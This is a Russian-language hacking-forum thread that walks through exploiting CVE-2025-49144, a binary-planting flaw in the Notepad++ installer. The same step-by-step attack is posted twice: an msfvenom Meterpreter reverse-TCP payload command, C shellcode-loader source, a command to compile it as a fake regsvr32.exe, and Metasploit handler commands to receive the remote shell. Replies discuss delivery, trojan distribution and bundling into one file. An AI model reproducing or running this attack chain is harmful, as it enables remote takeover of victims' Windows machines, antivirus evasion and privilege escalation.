• XSS.stack #1 – первый литературный журнал от юзеров форума

CVE-2025-49144 у notepad++

fox1a

floppy-диск
Пользователь
Регистрация
16.06.2025
Сообщения
8
Реакции
6
IMG_20250626_135614_115.jpg

Проблема в установщике notepad++ позволяет не только выполнять вредоносный код, но обходить AV и повышать привилегии. (CVE-2025-49144)

Иногда можно сказать "черту крипторы, когда есть такая возможность".
Она заключается в установке notepad++.

Дело в том, что во время установки на windows, он вызывает regsvr32.exe, но проблема в том, что в установщике, не указан полный путь к этому файлу.

Следовательно атакующий может заранее поместить фейковый regsvr32 в папку с установщиком и тогда вместо вызова C:\Windows\System32\regsvr32.exe, установщик обратится к regsvr32.exe атакующего.
А вредоносный код, сработает как легитимный файл.

Как провести атаку как на скриншоте?
Получаем shellcode
Bash:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=4444 -f c > shellc.txt

Создаём файл example.c с С кодом:
C:
#include <windows.h>
#include <stdio.h>

unsigned char shellcode[] = {
    // тут ваш шеллкод из shellc.txt
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    // ...
};

int main() {
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return -1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}

Собираем это всё в regsvr32.exe

Bash:
x86_64-w64-mingw32-gcc example.c -o regsvr32.exe -mwindows
И запускаем установщик notepad++ на целевой машине.

Далее запускаем meterpreter:
Bash:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 4444
run
 
Последнее редактирование:
Посмотреть вложение 108600
Уязвимость в notepad++ позволяет не только выполнять вредоносный код, но обходить AV и повышать привилегии. (CVE-2025-49144)

Иногда можно сказать "черту крипторы, когда есть такая уязвимость".
Она заключается в установке notepad++.

Дело в том, что во время установки на windows, он вызывает regsvr32.exe, но проблема в том, что в установщике, не указан полный путь к этому файлу.

Следовательно атакующий может заранее поместить фейковый regsvr32 в папку с установщиком и тогда вместо вызова C:\Windows\System32\regsvr32.exe, установщик обратится к regsvr32.exe атакующего.
А вредоносный код, сработает как легитимный файл.

Как провести атаку как на скриншоте?
Получаем shellcode
Bash:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=4444 -f c > shellc.txt

Создаём файл example.c с С кодом:
C:
#include <windows.h>
#include <stdio.h>

unsigned char shellcode[] = {
    // тут ваш шеллкод из shellc.txt
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    // ...
};

int main() {
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return -1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}

Собираем это всё в regsvr32.exe

Bash:
x86_64-w64-mingw32-gcc example.c -o regsvr32.exe -mwindows
И запускаем установщик notepad++ на целевой машине.

Далее запускаем meterpreter:
Bash:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 4444
run
сколько файлов на выходе получается?
 
Тем не менее это hijacking за счёт официального установщика notepad
Такая проблема имеет место быть в cve и его могут вполне использовать например для распространения трояна.
 
Тем не менее это hijacking за счёт официального установщика notepad
Такая проблема имеет место быть в cve и его могут вполне использовать например для распространения трояна.
у меня такое ощущение, что большинство из вас люди которые в принципе в этом не копались, по той причине, что каждый инсталлер имеет хотя бы одну подобную уязвимость, за исключением серьезных аудированных PE, например у crowdstrike edr инсталлера такого нет совершенно, если же брать все подряд zoom, slack, teams, 7z какие то сеты дров и тд, все со сто процентами имеет dllhijacking, или exehijacking, это никак не назвать "cve rce", это просто не прописанные пути и совершенно никак нельзя это использовать в бою, без обхода chrome/chromium/firefox блокировок, как ты ее доставишь? может опишешь метод
 
без обхода chrome/chromium/firefox блокировок, как ты ее доставишь? может опишешь метод
Достаточно того, что он будет находиться в одной директории с официальным инстраллером. То есть сам легитимный инстраллер становится причиной запуска трояна и без всякого смартскрина
 
Установщик и regsvr32.exe
Установщик сам запустит regsvr32
плохо, нужно что бы 1 файлом было все.
 
Пожалуйста, обратите внимание, что пользователь заблокирован


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх